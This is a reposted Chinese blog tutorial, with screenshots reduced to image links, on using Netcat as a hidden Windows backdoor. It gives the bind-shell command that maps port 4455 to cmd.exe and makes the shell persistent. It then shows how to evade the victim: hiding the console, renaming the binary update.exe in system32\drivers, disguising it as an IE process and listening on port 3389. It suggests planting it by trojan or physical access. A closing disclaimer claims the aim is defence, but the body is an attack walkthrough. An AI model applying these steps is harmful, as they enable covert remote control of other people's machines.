Netcat

一：簡介

瑞士軍刀大家都知道，但是Netcat被譽為網絡安全界的‘瑞士軍刀'，這個相信有不少朋友也都知曉~~一個可以透過使用TCP或UDP協定的網絡連接配接去讀寫資料。它被設計成一個穩定的後門工具， 

能夠直接由其它程式和腳本輕松驅動。 在中國，它的WINDOWS版有兩個版本，一個是原創者Chris Wysopal寫的原版本，另一個是由‘紅與黑'編譯 後的新‘濃縮'版。

二：安裝

我今天主要說的是在windows下的安裝，其實很簡單，下載下傳後的檔案中的nc.exe拷貝到c:\windows下

當然這安裝的是個後門，也就是你要攻擊的機器，是以這裡就看你的了，不管是通過木馬也好，還是你一棒把某網絡管理者打暈之後種到其Ｃ盤下～～～哈哈，這本錢可是下的夠大啊。

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684100Ib2D.jpg"></a>

三：使用

１.檢視被攻擊機的IP位址和攻擊機的IP位址

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684108zWkz.jpg"></a>

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_12456841141e1f.jpg"></a>

２.在被攻擊主機中使用

在被攻擊主機中運作nc.exe –l –p 4455 –e cmd.exe                         （在被攻擊中主機中開啟4455端口，将4455端口映射到cmd.exe程式中。）

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684118IZVp.jpg"></a>

攻擊者可以進行通路了。。。注意端口我們映射的是4455

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684122Tu87.jpg"></a>

跟我們正常連結一樣，進去了。。

可是如果被攻擊者有檢視端口程序的習慣你是不是傻了？來看

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684130Z6Cr.jpg"></a>

有192.168.0.18通過4455使用TCP連進了。。。

這樣也有個弊端，就是你通路之後不能随便切斷連結，這樣的話就連不上去了。。。隻要你退出，被攻擊主機也會随之退出

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_12456841366d3t.jpg"></a>

３.保持攻擊連結的持續性

其實在我前面給出指令nc.exe –l –p 4455 –e cmd.exe中的“-l”變為大寫的“-L”雖然windows不區分大小寫，但是這個工具本身是區分大小寫的。

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684141RJgR.jpg"></a>

這樣的話，我在來測試一次，看攻擊者退出後，被攻擊主機是否會斷開連接配接

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_12456841466cvW.jpg"></a>

對比上面的圖和這張圖，是否發現，如果不是大寫的L那麼它是會跳出登入的，直接傳回到C槽，而這裡使用大寫L後沒有跳出（L就是代表可持續性）

4.被攻擊主機隐藏攻擊終端

假如被攻擊者現在回到了自己的機器旁邊，并且進入了電腦，他是不是會很納悶？怎麼多出一個終端來？

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684152MS3P.jpg"></a>

而這時候他把這個一關，你是不是不能繼續控制了？

也不是，俗話說滴好，道高一尺魔高一丈，我們運作nc.exe –L –d –p 4455 –e cdm.exe    【-d保持在關閉cmd終端後，保持連接配接】

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_12456841571b3V.jpg"></a>

登入被攻擊主機

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_12456841621YjF.jpg"></a>

這個時候我把被攻擊機器的終端關閉了～～看看是否見效

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684168zsMH.jpg"></a>

毫無問題，可以繼續保持連接配接，到了這個時候你欺騙一些沒有電腦常識的人基本夠用了。。。但是如果是有些常識的人呢？在檢視程序數時候看到了一個未知程序我們一般直接Cut是吧？那麼這個程序會不會存在與程序中呢？

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684175F6GZ.jpg"></a>

看見了吧？嘿嘿，是不是也不好過關呢？

５.隐藏攻擊程式名稱，改成常見的系統程式

我把nc.exe攻擊程式移動到c:\windows\system32\drivers\   并且起個名字叫update.exe,是不有點迷惑性了。

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684180OTzd.jpg"></a>

指令沒有變，隻不過是路徑稍有變化。

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684185RHWe.jpg"></a>

程序中沒有了nc.exe程式，變成了update.exe

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684191uSWE.jpg"></a>

看看效果吧，200%可以正常登入

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684198gWfx.jpg"></a>

6.僞裝端口為常見端口80、3389

僞裝用在這是在貼切不過了，大家也有同感吧？也是hack一貫做法

我在c:\windows\system32\drivers\建立了一個檔案夾并且重命名為export，這時候需要c:\windows\下有一個nc.exe攻擊程式。。。意思大家大概已經知道了，就是要把c:\windows\nc.exe移動到c:\windows\system32\drivers\export下，然後運作，為了保險我把攻擊程式的名字也給替換掉了，改成了IE的正常程序。

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684204Rdwg.jpg"></a>

我先試了下80口，由于我機器已經有了80口在運作，我隻好用3389了，幸好早有預測呐

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684210SDeN.jpg"></a>

回車之後

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684221sL83.jpg"></a>

通過3389進入192.168.0.111（被攻擊主機後，進行檢視資訊）

我們在看看程序，是否有IE的程序

<a href="http://yangjunfeng.blog.51cto.com/attachment/200906/22/539796_1245684230LaxL.jpg"></a>

Netcat功能确實很強大，還有許多我們有列舉出來，放在安全架構中主要是為了教給大家hack是如何攻擊的，我們如何采取防範。切勿去###嘿嘿，首先聲明，本人隻是教了這個防範措施，幹了壞事後于本人無關。。。

本文轉自yangjunfeng 51CTO部落格，原文連結:http://blog.51cto.com/yangjunfeng/168972